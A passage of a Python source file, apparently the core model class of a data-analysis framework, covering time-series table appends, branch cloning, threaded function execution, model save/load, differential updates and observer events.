self.model[id]["value"] = numpy.append(self.model[id]["value"],blob[path]) #todo: this is a very inefficient copy and reallocate
if id in tableColumnIds:
tableColumnIds.remove(id)
#append this value
for id in tableColumnIds:
self.model[id]["value"] = numpy.append(self.model[id]["value"],numpy.full(valuesLen,numpy.inf,dtype=numpy.float64)) # pad the remainings with inf
#now trigger observser
self.__notify_observers(self.get_leaves_ids(columnsId),"value")
else:
#time sorted: find a place to insert the data in the times
currentTimes = numpy.asarray(self.get_value(timeId),dtype=numpy.float64)
startTime = blob[timePath][0]
endTime = blob[timePath][-1]
firstIndexGreaterStart, = numpy.where(currentTimes>startTime) #where returns tuple
if len(firstIndexGreaterStart) == 0:
firstIndexGreaterStart = tableLen
else:
firstIndexGreaterStart=firstIndexGreaterStart[0]
firstIndexGreaterEnd, = numpy.where(currentTimes > endTime)
if len(firstIndexGreaterEnd) == 0:
firstIndexGreaterEnd = tableLen
else:
firstIndexGreaterEnd=firstIndexGreaterEnd[0]
if firstIndexGreaterEnd != firstIndexGreaterStart:
self.logger.error("we can't insert the data in a row-wise time manner, only as block")
return False
startIndex = firstIndexGreaterStart # the position to insert the incoming data
self.logger.debug(f"insert data @{startIndex} of {tableLen}")
for path in blob:
if path.split('.')[-1]=="time":
id = timeId # we take the existing time Node of the table instead of just the variable named "time"
else:
id = self.get_id(path) # here
self.model[id]["value"] = numpy.insert(self.model[id]["value"],startIndex,blob[path]) #todo: this is a very inefficient copy and reallocate
if id in tableColumnIds:
tableColumnIds.remove(id)
#append this value
for id in tableColumnIds:
self.model[id]["value"] = numpy.insert(self.model[id]["value"],startIndex,numpy.full(valuesLen,numpy.inf,dtype=numpy.float64)) # pad the remainings with inf
#
pass
return True
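# Usage sketch (hypothetical): append_table can autocreate a table from plain paths; the time
# values must arrive in a variable whose path ends with ".time".
#   m.append_table({"root.mydata.time": [1000.0, 1001.0],
#                   "root.mydata.temp": [20.1, 20.2]})   # creates an "_autotable" on first use
#   m.append_table({"root.mydata.time": 1002.0})         # missing columns are padded with inf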
def __show_subtree(self,rootId):
currentBrowsePath = self.get_browse_path(rootId)
indentation = "| "*(len(currentBrowsePath.split('.'))-1)
print (indentation+"-",self.model[rootId]["name"],end="")
noShowProperties=["name","parent","children"]
for property in self.model[rootId]:
try:
if property=="value" and len(self.model[rootId]["value"])>10:
print(",len:"+str(len(self.model[rootId]["value"])),end="")
except:
pass
if not property in noShowProperties:
try:
#if this entry has a len and the len is larger then 20, show only a part of it
if len(self.model[rootId][property]) > 10:
print("," + property + "=" + str(self.model[rootId][property][0:10])+"...("+str(len(self.model[rootId][property]))+")", end="")
else:
print("," + property + "=" + str(self.model[rootId][property]), end="")
except:
print("," + property + "=" + str(self.model[rootId][property]), end="")
if self.model[rootId]["type"]=="timeseries":
print(","+self.time_series_get_info(rootId), end="")
print("")
for child in self.model[rootId]["children"]:
self.__show_subtree(child)
def execute_object_function(self,desc,functionName,parameter=None):
with self.lock:
id = self.get_id(desc)
object = self.get_object(id)
if not object:
return False
try:
functionPointer = getattr(object,functionName)
self.executionQueue.put({"functionPointer":functionPointer,"parameter":parameter,"id":id})
return True
except:
self.logger.error(f"function {functionName} not sttr of object {desc} {object}")
return False
def execute_function(self,desc,parameter = None):
"""
create a thread to execute a function there,
if the function has autoReload, we re-import the external
file
Args:
desc: node descriptor of the node (type "function") to be executed
Returns:
True if the execution thread was launched
"""
with self.lock:
id = self.get_id(desc)
if self.model[id]["type"]!= "function":
return False
functionName = self.model[id]["functionPointer"]
if not functionName in self.functions:
self.logger.error(f"can't find function {functionName} in global list")
return False
functionNode = self.get_node(id)
executionType = functionNode.get_child("control").get_child("executionType").get_value()
if executionType in ["async","sync"]:
self.executionQueue.put(id)
self.logger.info(f"function {desc} queued for execution")
return True
elif executionType =="threaded":
self.logger.info(f"function {desc} started in thread")
thread = threading.Thread(target=self.__execution_thread, args=[id])
thread.start()
return True
else:
self.logger.error(f"function {desc} cant be started, unknown execution type {executionType}")
return False
#check if function is interactive, then we reload it right now
if self.model[id]["autoReload"] == True and self.global_auto_reload_enabled():
#if self.functions[functionName]["isInteractive"]:
# must reload the module
module = importlib.reload(self.functions[functionName]["module"])
functionPointer = getattr(module,functionName.split('.',1).pop())
#now update our global list
self.functions[functionName]["module"] = module
self.functions[functionName]["function"] = functionPointer
#here, the lock is open again!
try:
if executionType == "async" or executionType == "threaded":
thread = threading.Thread(target=self.__execution_thread, args=[id])
thread.start()
return True
elif executionType == "sync":
self.__execution_thread(id) # call it sync here
return True
else:
self.logger.error("unsupported execution type"+str(executionType)+" in fuction"+str(id))
raise(Exception)
except:
return False
def start_function_execution_thread(self):
self.functionExecutionRunning = True
self.functionExecutionThread = threading.Thread(target=self._function_execution_thread)
self.functionExecutionThread.start()
def _function_execution_thread(self):
while self.functionExecutionRunning:
try:
nextId = self.executionQueue.get(timeout=1)
self.logger.info(f"now executing function {str_lim(nextId,300)}")
self.__execution_thread(nextId)
except:
pass
def delete(self):
self.functionExecutionRunning = False
def exit(self):
self.delete()
def close(self):
self.delete()
def __dispatch(self,function,timeout,param):
thread = threading.Thread(target=self.__dispatch_thread_function, args=[function,timeout,param])
thread.start()
def __dispatch_thread_function(self,function,timeout,param):
time.sleep(timeout)
function(param)
#exit thread
def reset_progress_bar(self,controlNode):
controlNode.get_child("progress").set_value(0)
def __clone_children(self,source,dest):
""" see def clone() for more info """
sourcePath = self.get_browse_path(source)
destPath = self.get_browse_path(dest)
for childName,childInfo in self.get_children_dict(source).items():
childId = childInfo["id"]
if childInfo["type"] in ["timeseries","file","column"]:
self.logger.debug(f"clone skip node {childInfo['name']}")
continue
newProps = {k:v for k,v in childInfo.items() if k not in ["parent","children","backRefs","forwardRefs","browsePath","id","name"]}
cloneId = self.create_node_from_path(destPath+"."+childInfo["name"],properties=newProps)
grandChildren = self.get_children_dict(childId)
if grandChildren != {}:
self.__clone_children(childId,cloneId)
def __clone_referencer_targets(self,source,dest):
""" see def clone() for more info """
sourcePath = self.get_browse_path(source)
destPath = self.get_browse_path(dest)
childIds = self.get_node_info(sourcePath)["children"]
while childIds:
id = childIds.pop()
info = self.get_node_info(id)
if info["type"]=="referencer":
newreferencer = self.get_browse_path(id).replace(sourcePath, destPath)
#now check: if the referencers points to something inside, we do the same but in the target root, else we take it as it is
for targetId in info["forwardRefs"]:
targetPath = self.get_browse_path(targetId)
newTargetPath = targetPath.replace(sourcePath,destPath)# if not found, we get it unchanged
self.add_forward_refs(newreferencer,[newTargetPath])
childIds.extend(info["children"])
def clone(self,desc):
"""
clone a node and all its subnodes (a whole branch)
we will create all nodes which existed in the source branch; for the referencers we use this strategy:
references pointing to a node under the source branch will be translated to references in the target branch
pointing to the corresponding new node in the target branch
references pointing outside the source branch will also be created in the cloned branch pointing to
the same target
Args:
desc: the source node descriptor
"""
sourcePath = self.get_browse_path(desc)
if not sourcePath:
return False
targetPath = sourcePath+"_"+getRandomId()
sourceInfo = self.get_node_info(desc)
transferRoot = self.create_node_from_path(targetPath,properties={"type":sourceInfo["type"]})
#now iterate over the nodes and children and create the same nodes
self.__clone_children(desc,transferRoot)
self.__clone_referencer_targets(sourcePath,transferRoot)
return True
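# Usage sketch (hypothetical): clone a whole branch; the copy is created next to the source
# under "<sourcePath>_<randomId>", references inside the branch are re-targeted to the copy,
# references to nodes outside the branch are kept unchanged.
#   m.clone("root.widgetTemplate")   # -> True on success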
def execute_synchronous(self,id):
"""
execute a function synchronously here (this can be useful when executing a function within another)
"""
return self.__execution_thread(id)
def __execution_thread(self,id):
"""
the thread function to execute functions
it currently uses the global lock so it will lock out any other work on the model during execution
all inputs and outputs are found in the model
we also set the status and result from here, not needed to do that in the function
Args:
id: the node id of the function to be executed or the dict for an object call
"""
try:
if type(id) is str:
if self.model[id]["type"] == "function":
isFunction = True
else:
isFunction = False
with self.lock:
if isFunction:
if self.model[id]["autoReload"] == True and self.global_auto_reload_enabled():
# must reload the module
functionName = self.model[id]["functionPointer"]
module = importlib.reload(self.functions[functionName]["module"])
functionPointer = getattr(module, functionName.split('.', 1).pop())
# now update our global list
self.functions[functionName]["module"] = module
self.functions[functionName]["function"] = functionPointer
#self.logger.info(f"in execution Thread {threading.get_ident()}, executing {id} {functionName}")
#check the function
functionName = self.model[id]["functionPointer"]
functionPointer = self.functions[functionName]['function']
self.logger.info(f"in execution Thread {threading.get_ident()}, executing {id} {functionName}")
else:
functionPointer = id["functionPointer"]
functionName = functionPointer.__name__
parameter = id["parameter"]
id = id["id"] #for deeper down
#now set some controls
try:
node = self.get_node(id)
controlNode = node.get_child("control")
targetId = self.get_id("root.system.progress.targets")
if targetId:
self.disable_observers()
self.remove_forward_refs(targetId)
self.add_forward_refs(targetId,[controlNode.get_child("progress").get_id()])
self.enable_observers()
# we don't signal these things
self.disable_observers()
controlNode.get_child("status").set_value("running")
controlNode.get_child("result")#.set_value("pending")
controlNode.get_child("progress").set_value(0)
#controlNode.get_child("signal").set_value("nosignal")
startTime = datetime.datetime.now()
controlNode.get_child("lastStartTime").set_value(startTime.isoformat())
self.enable_observers()
except:
self.logger.error("error during execution preparation, this can be critical, maybe disabled observers")
self.log_error()
pass
# model lock open: we execute without model lock
if isFunction:
result = functionPointer(node) # this is the actual execution
else:
result = functionPointer(parameter)
#now we are back, set the status to finished
duration = (datetime.datetime.now()-startTime).total_seconds()
with self.lock:
# this is a bit dangerous, maybe the node is not there anymore?, so the
# inner functions calls of node.xx() will return nothing, so we try, catch
try:
self.logger.debug(f"function {functionName} execution completed in {duration} ")
self.disable_observers() # we don't signal these
controlNode.get_child("lastExecutionDuration").set_value(duration)
controlNode.get_child("status").set_value("finished")
controlExecutionCounter = controlNode.get_child("executionCounter")
controlExecutionCounter.set_value(controlExecutionCounter.get_value() + 1)
controlProgress = controlNode.get_child("progress")#.set_value(0)
controlProgress.set_value(0)
self.enable_observers()
self.notify_observers([controlExecutionCounter.get_id(),controlProgress.get_id()],"value")
if not isFunction:
result = True # for execution of member function we don't have a general return code
if result == True:
controlNode.get_child("result").set_value("ok")
self.publish_event("result of " + str(functionName) + ": " + controlNode.get_child("result").get_value())
else:
if controlNode.get_child("result").get_value() == "pending":
#if the functions hasn't set anything else
controlNode.get_child("result").set_value("error")
#also publish this result
self.publish_event("error in " + str(functionName) + ": " + controlNode.get_child("result").get_value())
# except:
# self.logger.error("problem setting results from execution of #"+str(id))
except Exception as ex:
errorString = str(sys.exc_info()[1])
self.logger.error("error inside execution thread, id" +str(id)+" functionname"+str(functionName)+errorString+" "+str(ex)+" "+str(traceback.format_exc()))
pass
except Exception as ex:
errorString = str(sys.exc_info()[1])
self.logger.error("error inside execution thread, id " +str(id)+" functionname"+str(functionName)+errorString+" "+str(ex)+" "+str(traceback.format_exc()))
controlNode.get_child("status").set_value("interrupted")
controlNode.get_child("result").set_value("error:"+errorString)
controlNode.get_child("progress").set_value(0)
self.publish_event("error in "+str(functionName)+": "+errorString)
return
def get_error(self):
s=f"{sys.exc_info()[1]}, {traceback.format_exc()}"
return s
def log_error(self):
self.logger.error(self.get_error())
def show(self):
"""
show the current model as an ASCII tree on the console
"""
with self.lock:
self.__show_subtree("1")
def save_model(self):
return self.save(self.currentModelName,includeData=False)
# save model and data to files
def save(self, fileName, includeData = True):
"""
save the model to disk, save the tables separately
the model file will be saved as ./models/fileName.model.json and the tables will be saved under
./models/fileName.tablePath.npy
Args:
fileName: the name to store it under, please don't give extensions
includeData: if set to False, we DON'T store the values of nodes of type table or file to disk
"""
self.logger.debug(f"save model as {fileName} with data {includeData}")
self.publish_event(f"saving model {fileName}...")
with self.lock:
try:
m = self.get_model_for_web() # leave out the tables
model_directory = None
model_filename = None
if os.path.isabs(fileName):
model_directory = os.path.dirname(fileName)
model_filename = os.path.basename(fileName)
else:
file_directory = os.path.dirname(fileName)
if len(file_directory) == 0:
# we are only given a filename, use 21datalab subfolder models as directory
model_directory = os.path.join(os.path.dirname(__file__), "models")
model_filename = fileName
else:
# we are given a relative path + filename
model_directory = os.path.dirname(fileName)
model_filename = os.path.basename(fileName)
if includeData:
self.ts.save(os.path.join(model_directory, model_filename))
f = open(os.path.join(model_directory, model_filename)+ ".model.json", "w")
f.write(json.dumps(m, indent=4))
f.close()
self.currentModelName = fileName
self.publish_event(f"model {fileName} saved.")
return True
except Exception as e:
self.logger.error("problem sving "+str(e))
self.publish_event(f"saving model {fileName} error")
return False
def move(self, nodeList, newParent, newIndex=None):
"""
move a list of nodes under a new Parent on the child position new Index
if the newParent is a referencer, we are creating references instead and keep the nodes where they are
Args:
nodeList [string]: a list of node descriptors of the nodes to move, a scalar is also allowed
newParent [string]: a node descriptor for the new parent under which the nodes should appear
newIndex (int): the position in the children of newParent where the new nodes should appear
Returns:
True
"""
with self.lock:
if not type(nodeList) is list:
nodeList = [nodeList]
nodeIds = self.get_id(nodeList)
parentId = self.get_id(newParent)
if not parentId: return False
#check the special case that the parent is a referencer:
if self.model[parentId]["type"] == "referencer":
self.add_forward_refs(parentId,nodeIds)
self.logger.info("moves nodes as references "+ parentId + str(nodeIds))
return True
#for all others, we start moving nodes
self.logger.debug(f"model.move():{nodeIds}=>{parentId}")
try:
for id in nodeIds:
if id == parentId or id == "1":
self.logger.error("cant move " +id + " to " + parentId)
continue
oldParent = self.model[id]["parent"]
self.model[oldParent]["children"].remove(id) # remove the child from the old parent
self.model[id]["parent"]=parentId
if newIndex:
self.model[parentId]["children"].insert(newIndex,id) # at specific index
else:
self.model[parentId]["children"].append(id) # at the end
self.__notify_observers(oldParent, "children")
self.__notify_observers(parentId, "children")
except Exception as ex:
self.logger.error(f"problem moving {nodeIds} to new parent {parentId} this is critical, the model can be messed up {ex}")
return True
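# Usage sketch (hypothetical): moving under a referencer creates references instead of moving.
#   m.move(["root.a.node1", "root.a.node2"], "root.b")        # re-parents the nodes under root.b
#   m.move("root.a.node1", "root.widget.selectedVariables")   # referencer target: adds a forward ref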
def clean_ts_entries(self):
"""
remove timeseries data that has no node and remove nodes (of type timeseries) that have no timeseries data
"""
self.logger.debug("clean_ts_entries(): check consistency of model and timeseries table..")
deleteNodes = []
for id, node in self.model.items():
if node["type"] == "timeseries":
info = self.ts.get_info(id)
if "not found" in info:
self.logger.info(f" {node['name']}: has no time series date entry in the ts table, remove node")
deleteNodes.append(id)
for id in deleteNodes:
self.delete_node(id)
deleteTs=[]
for id in self.ts.get_items():
if id not in self.model:
self.logger.info(f" timeseries data {id} has no corresponding node in model .. delete the ts-data")
self.ts.delete(id)
def load(self,fileName,includeData = True, update = False):
"""
replace the current model in memory with the model from disk
please give only a name without extensions
the filename must be in ./models
Args:
fileName(string) the name of the file without extension, we also accept a dict here: a list of nodes
includeData bool: if set to false, the values for tables and files will NOT be loaded
update : if set to true, auto correct missing entries in known templates
"""
result = False
self.logger.info(f"load {fileName}, includeData {includeData}")
with self.lock:
self.publish_event(f"loading model {fileName}...")
self.disable_observers()
try:
if type(fileName) is str:
model_directory = None
model_filename = None
if os.path.isabs(fileName):
model_directory = os.path.dirname(fileName)
model_filename = os.path.basename(fileName)
else:
file_directory = os.path.dirname(fileName)
if len(file_directory) == 0:
# we are only given a filename, use 21datalab subfolder models as directory
model_directory = os.path.join(os.path.dirname(__file__), "models")
model_filename = fileName
else:
# we are given a relative path + filename
model_directory = os.path.dirname(fileName)
model_filename = os.path.basename(fileName)
#if os.path.dirname(fileName)
f = open(os.path.join(model_directory, model_filename) + ".model.json","r")
model = json.loads(f.read())
self.model = model
f.close()
self.currentModelName = fileName
elif type(fileName) is dict:
self.model = copy.deepcopy(fileName) # take over the nodes
self.currentModelName = "fromNodes"
#now also load the tables
self.globalIdCounter = 0 #reset the counter and recover it further down
for nodeId in self.model:
if not self.idCreationHash:
#we only recover the counter if necessary
if int(nodeId)>self.globalIdCounter:
self.globalIdCounter = int(nodeId) # here, we recover the global id counter
if includeData:
if "version" in self.model["1"] and self.model["1"]["version"]>=0.1:
#new loader
self.ts.load(os.path.join(model_directory, model_filename))
else:
self.logger.debug("time series compatibility loader")
#we assume data in file and use the standard inmemory table storage
for nodeId in self.model:
if self.get_node_info(nodeId)["type"] == "table":
table = self.get_browse_path(nodeId)
data = numpy.load(os.path.join(model_directory, model_filename) + "." + table + ".npy")
#now find the time data, apply it to all variables
timeId=self.find_table_time_node(table)
ids = self.get_leaves_ids(table+".columns")
for id, column in zip(ids, data):
if id==timeId:
times = column
else:
self.ts.create(id)
self.set_properties({"type":"timeseries"},id)
self.ts.set(id,values=column)
for id in ids:
if id == timeId:
continue
self.ts.set(id,times=times)
self.clean_ts_entries() # make sure the model and ts table is consistent
self.instantiate_all_objects()
self.reset_all_objects()
self.enable_observers()
self.publish_event(f"loading model {fileName} done.")
self.model["1"]["version"]=self.version #update the version
result = True
except Exception as e:
self.logger.error("problem loading"+str(e))
self.publish_event(f"loading model {fileName} error.")
self.enable_observers()
result = False
if update:
self.update() # automatically adjust all widgets and other known templates to the latest style
return result
def create_differential_handle(self, user = None):
"""
make a copy of the current model and keep it as copy, create a handle for it and return that handle
this new handle is at the same time the id of the new "user"; all the following requests for differential updates
will be referred to this user id
Returns:
a hash handle for the current model
"""
with self.lock:
#newHandle = str(uuid.uuid4().hex) # make a new unique handle
newHandle = str(self.diffHandleCounter)
self.diffHandleCounter += 1
if not user:
#also create a new user
user = newHandle
self.differentialHandles[newHandle]= {
"user":user,
"model":self.get_model_for_web(),
"time": int(time.time()),
"updateCounter": self.modelUpdateCounter
}# make an entry by copying the whole model
return newHandle
def get_differential_update(self,oldHandle,newHandle=None):
"""
this function takes the copy of the model (hopefully) held under oldHandle and compares it to the current model:
the differences are analyzed and returned
to avoid endless storage of old versions, we have the following deletion strategy: for every "user" we keep a max of
self.differentialHandlesMaxPerUser entries, if we have more, we delete the oldest
Args:
oldHandle (string): the unique id of the old version of the model
newHandle (string): the unique id of the new version to compare to, if not given, we take the current
and will automatically make a new entry for the current
Returns (dict):
containing information about the changes between and old and new version of the model
key values:
"handle":(string): the handle under which we find the new version of the model
"newNodes": (dict) nodes which are new to the tree in the form Nodeid:{properties}
"deletedNodeIds": (list) list of node ids which have been deleted
"modifiedNodes": (dict) nodes which have changed properties: if so, we give the full updated node back
"""
with self.lock:
diff={"handle":None,"newNodes":{},"deletedNodeIds":[],"modifiedNodes":{}} # the response for web
if oldHandle not in self.differentialHandles:
return None # the old handle does not exist, we can't handle this request
if newHandle is None:
# this is the standard case, we generate the new handle now
user = self.differentialHandles[oldHandle]["user"]
# we make a quick check if the model has changed at all, if not we simply return the old handle
if self.differentialHandles[oldHandle]["updateCounter"] == self.modelUpdateCounter:
self.logger.debug("get_differential_update: shortcut for no changes")
diff["handle"] = oldHandle
return diff
newHandle = self.create_differential_handle(user=user) # this function also makes a copy of the current tree and puts it in the self.differential handles list
newModel = self.differentialHandles[newHandle]["model"]
else:
if newHandle in self.differentialHandles:
newModel = self.differentialHandles[newHandle]
else:
return None # the newhandle did not exist
oldModel = self.differentialHandles[oldHandle]["model"]
# delete strategy: for every "user" we track a maximum of self.differentialHandlesMaxPerUser
users={}
for handle,entry in self.differentialHandles.items():
user = entry["user"]
if user not in users:
users[user]={}
users[ user][ handle ] = entry["time"]
for user,entries in users.items():
if len(entries)> self.differentialHandlesMaxPerUser:
#must clean up history of that user, entries is a dict of handle:time
sortedKeys =[key for key, value in sorted(entries.items(), key=lambda item: item[1])]
removeKeys = sortedKeys[:-self.differentialHandlesMaxPerUser]
self.logger.debug("remove handle"+str(removeKeys)+" of user"+user)
for key in removeKeys:
del self.differentialHandles[key]
#find the changes between the models
for newNodeId in newModel:
if newNodeId not in oldModel:
#this node is not found in the old model, so it is new
diff["newNodes"][newNodeId]=copy.deepcopy(newModel[newNodeId])
else:
#this node is in both models, check if there was a change inside the nodes
#for a deep comparison, serialize them
newNodeSerialized = json.dumps(newModel[newNodeId],sort_keys=True)
oldNodeSerialized = json.dumps(oldModel[newNodeId],sort_keys=True)
if newNodeSerialized != oldNodeSerialized:
#something is different, so return that node
diff["modifiedNodes"][newNodeId]=copy.deepcopy(newModel[newNodeId])
#now check for deleted ones, these appear in the old but not in the new
diff["deletedNodeIds"]=list(set(oldModel.keys())-set(newModel.keys()))
diff["handle"]=newHandle
return diff
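# Usage sketch (hypothetical) of the differential-update polling cycle used by a web frontend:
#   handle = m.create_differential_handle()    # snapshot of the current model
#   ...                                        # model changes happen here
#   diff = m.get_differential_update(handle)   # newNodes / modifiedNodes / deletedNodeIds
#   handle = diff["handle"]                    # keep the returned handle for the next poll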
def publish_event(self, event):
"""
send out an event e.g. for status information
the event to send looks like
event = { "id": 1123,
"event": "system.status",
"data": {"nodeId": xx, "value": .., "function": ...}
}
Args
event [string or dict]
"""
self.logger.debug(f"publish_event ({event})")
self.modelUpdateCounter += 1
if type(event) is str:
#make sure the formatting is json compatible
event = event.replace("'",'"')# ' => "
event={"event":"system.status","data":{"text":event}}
event["id"]=self.modelUpdateCounter
for observerObject in self.observers:
observerObject.update(event)
def disable_observers(self):
self.lock_model()
#with self.lock:
self.disableObserverCounter += 1
#self.logger.debug(f"disable_observers() {self.disableObserverCounter}")
def enable_observers(self):
self.release_model()
if self.disableObserverCounter >0:
self.disableObserverCounter -=1
else:
self.logger.error("enable_observers without disable observers")
#self.logger.debug(f"enable_observers() {self.disableObserverCounter}")
def notify_observers(self, nodeIds, properties, eventInfo={}):
"""
public wrapper for __notify_observers, expert use only!
"""
#self.logger.info(f"notify observses(), {str_lim(nodeIds,50)}, {properties}")
return self.__notify_observers(nodeIds,properties,eventInfo)
def get_referencers(self,descList,deepLevel = 0):
"""
get the references to this node via backtraversing the leaves algorithm
we look for parents through deepLevel levels and from there on we look back for referencers
deepLevel is the number of extra parent levels: 1 means one extra level, 2 means two extra levels
Returns:
a list of referencers ids that point to the given descList nodes
"""
#convert all to nodes to ids
if type(descList) is not list:
descList = [descList]
startList = set([self.__get_id(node) for node in descList])
startList =set([node for node in startList if node]) #remove None and duplicates
referencers = set() #we collect the parents here and avoid duplicates
#in this first iteration we take the referencers pointing directly to the nodes or their parents
workList = startList.copy()
for level in range(deepLevel+1):
#from this level we take the backrefs
for id in workList:
referencers.update(self.model[id]["backRefs"])
#prepare parents for next round
parents=set()
for id in workList:
myParent=self.model[id]["parent"]
if myParent not in ["0","1"]: #root
parents.update([myParent]) #!use list to avoid break into chars
#now take the parents as currentList
workList = parents.copy()
if not workList:
break #avoid turning cycles for nothing
#second step:
# now we take all final referencers and all referencers to those referencers with no limit
# (go back the leaves algorithm)
collectedReferencers = referencers.copy() # we take all we have so far
while True:
workList=set()
for id in referencers:
workList.update(self.model[id]["backRefs"])
collectedReferencers.update(workList)
if not workList:
break
else:
#one more round
referencers = workList.copy()
return list(collectedReferencers)
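# Usage sketch (hypothetical): collect all referencers that point (directly or via chains of
# referencers) to a node or to one of its parents up to deepLevel levels; this is the lookup
# used by __notify_observers below.
#   refIds = m.get_referencers("root.sensor1", deepLevel=2)   # list of referencer node ids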
def __notify_observers(self, nodeIds, properties, eventInfo={} ):
"""
this function is called internally when nodes or properties have changed. Then, we look if any
observer has to be triggered
we also increase the counter and time on the root.observers.modelObserver
Args:
nodeIds: the node id or list of node ids where a change occurred
properties: the property or list of properties of the node that has changed
"""
#exception for the progress node
if type(properties) is not list:
properties = [properties]
if type(nodeIds) is not list:
nodeIds = [nodeIds]
if self.disableObserverCounter>0:
#only one exception: progress works always
mustReturn = True
with self.lock:
for nodeId in nodeIds:
if self.model[nodeId]["name"] == "progress":
mustReturn = False
break
if mustReturn:
#self.logger.info(f"__notify_observers disable return {nodeIds} {properties}")
return
with self.lock:
# this is for the tree updates, any change is taken
self.modelUpdateCounter = self.modelUpdateCounter + 1 #this is used by the diff update function and model copies
collectedEvents=[]
enableTree = self.get_node("root.system.enableTreeUpdateEvents")
if enableTree and enableTree.get_value()==False:
pass
else:
# Notify all observers about the tree update, this is a standard
event = {
"id": self.modelUpdateCounter,
"event": "tree.update",
"data": ""}
collectedEvents.append(event) # send later
names =[self.model[id]["name"] for id in nodeIds]
self.logger.debug(f"__notify_observers {len(nodeIds)} ids:{str_lim(names,100)}: {properties}")
triggeredObservers=[] # we use this to suppress multiple triggers of the same observer, the list holds the observerIds to be triggered
#p=utils.Profiling("__notify.iterate_nodes")
referencers = self.get_referencers(nodeIds,deepLevel=5)#deeplevel 5: nodes can be organized by the user in hierarchies
nodeId = self.__get_id(nodeIds[0])#take the first for the event string,
#p.lap(f"get refs for {nodeId}")
self.logger.debug(f"__notify on {len(referencers)} referencers: {str_lim([self.get_browse_path(id) for id in referencers],200)}")
for id in referencers:
if self.model[id]["name"] == "targets" and self.model[self.model[id]["parent"]]["type"] == "observer":
# this referencers is an observer,
observerId = self.model[id]["parent"]
observer = self.get_children_dict(observerId)
# check if trigger
if observer["enabled"]["value"] == True:
#self.logger.debug(f"{self.model[nodeId]['name']} is targeted by observer {self.get_browse_path(observerId)}")
if observerId in triggeredObservers:
self.logger.debug(f"we have triggered the observer {self.get_browse_path(observerId)} in this call already, pass")
continue
#self.logger.debug(f"check properties to triggered the observer {self.get_browse_path(observerId)}")
#check if any of the observed properties matches
propertyMatch = False
for property in properties:
if property in observer["properties"]["value"]:
propertyMatch=True
break
if not propertyMatch:
#self.logger.debug(f"observer trigger on {self.get_browse_path(observerId)} no property match ")
pass
else:
self.logger.debug(f"observer trigger on {self.get_browse_path(observerId)} for change in {property}")
self.model[observer["triggerCounter"]["id"]]["value"] = self.model[observer["triggerCounter"]["id"]]["value"]+1
self.model[observer["lastTriggerTime"]["id"]]["value"] = datetime.datetime.now().isoformat()
for funcNodeId in self.get_leaves_ids(observer["onTriggerFunction"]["id"]):
self.logger.debug(f"execute ontrigger function {funcNodeId}")
self.execute_function(funcNodeId)
if "triggerSourceId" in observer:
self.model[observer["triggerSourceId"]["id"]]["value"] = nodeId
if observer["hasEvent"]["value"] == True:
#self.logger.debug(f"send event {observer['eventString']['value']}")
#also send the real event
#self.modelUpdateCounter = self.modelUpdateCounter+1
event = {
"id": self.modelUpdateCounter,
"event": observer["eventString"]["value"],
"data": {"nodeId":observerId,"sourceId":nodeId,"sourcePath":self.get_browse_path(nodeId)}}
if self.model[nodeId]["type"] not in ["column","file","timeseries"]:
event["data"]["value"]=self.model[nodeId]["value"]
#some special handling
try:
if event["event"] == "system.progress":
progressNode = self.get_node(self.get_leaves_ids("root.system.progress.targets")[0])
event["data"]["value"] = progressNode.get_value()
event["data"]["function"] = progressNode.get_parent().get_parent().get_browse_path()
else:
eventNode = self.get_node(observerId)
extraInfoNode = eventNode.get_child("eventData")
if extraInfoNode:
extraInfo = extraInfoNode.get_value()
if type(extraInfo) is not dict:
extraInfo={"info":extraInfo}
event["data"].update(extraInfo)
if eventInfo:
event["data"]["_eventInfo"]=eventInfo #put this only if we have info
except Exception as ex:
self.logger.error(f"error getting extra info for event {ex}, {sys.exc_info()[0]}")
#for all other events, take the event data if there is one (as json)
self.logger.debug(f"generate event {event}")
collectedEvents.append(event)
triggeredObservers.append(observerId)# next time, we don't trigger
#p.lap("complete backrefs {nodeId}, {backrefs}")
#self.logger.debug(p)
#self.logger.debug("now send the events")
#event = copy.deepcopy(event)
for event in collectedEvents:
for observerObject in self.observers:
observerObject.update(event)
self.logger.debug(f"done sending {len(collectedEvents)} events")
def create_observer(self):
# Instantiate a new observer
observer = Observer(self)
# attach it to the model
self.attach_observer(observer)
# return the observer
return observer
def attach_observer(self, observer):
# Add a new observer
self.logger.debug(f"Adding new observer: {id(observer)}")
with self.lock:
self.observers.append(observer)
def detach_observer(self, observer):
with self.lock:
try:
self.observers.remove(observer)
self.logger.debug(f"Removing observer: {id(observer)}")
except ValueError:
self.logger.exception("Trying to remove an observer which doesn't exist in the list of observers.")
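# Usage sketch (hypothetical, assuming m is a Model instance and Observer consumes events via update(event)):
#   obs = m.create_observer()   # creates and attaches a new observer
#   ...                         # events from __notify_observers are now forwarded to obs.update(event)
#   m.detach_observer(obs)      # stop receiving events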
def set_column_len(self,nodeDescriptor,newLen):
"""
adjust the length of a column; extensions are NaN-padded
Args:
nodeDescriptor: the column node
newLen (int): the new length of the column
Returns:
the new length that was set, or None if there was a problem
"""
with self.lock:
id = self.get_id(nodeDescriptor)
if not id: return None
if self.model[id]["type"] != "column":
self.logger.error("set_column_len: not a column")
return None
#now make the adjustments
if type(self.model[id]['value']) != numpy.ndarray:
self.model[id]['value'] = numpy.full(newLen, numpy.nan)
else:
#is already an array
if len(self.model[id]['value']) > newLen:
self.model[id]['value'] = self.model[id]['value'][0:newLen]
elif len(self.model[id]['value']) < newLen:
self.model[id]['value'] = numpy.append(self.model[id]['value'], numpy.full(newLen-len(self.model[id]['value']), numpy.nan))
#if the length already matches, there is nothing to do
return newLen
def get_upload_folder_files(self, matchFilter=None, blackList = []):
"""
Args:
matchFilter: a string that must be contained in a file name for the file to be delivered
blackList: a list of file names which should not be delivered
Returns: a list of the found file names and a list of the same files with absolute paths
"""
full_path = os.path.realpath(__file__) # the canonical path of this source file
path, filename = os.path.split(full_path)
folder = os.path.join(path, 'upload')
absFileNames = []
foundFileNames = []
#now iterate the uploaded files
fileNames = os.listdir(folder)
for fileName in fileNames:
if matchFilter:
if matchFilter not in fileName:
continue # this file will be ignored
if fileName in blackList:
continue
foundFileNames.append(fileName)
absFileNames = [os.path.join(folder, fileName) for fileName in foundFileNames]
return foundFileNames,absFileNames
def update(self):
"""
update all known widgets to the latest template including complex backward compatibility changes
:return:
"""
self.logger.info("update() running...")
self.disable_observers()
try:
# the ts widgets:
# go through the widgets and update them all according to the template
# first find all nodes of type widget
newNodes = {}
helperModel = Model()
helperModel.disable_observers()
helperModel.create_template_from_path("root.widget", self.get_templates()['templates.timeseriesWidget'])
widgets = []
for id, props in self.model.items():
if props["type"] == "widget":
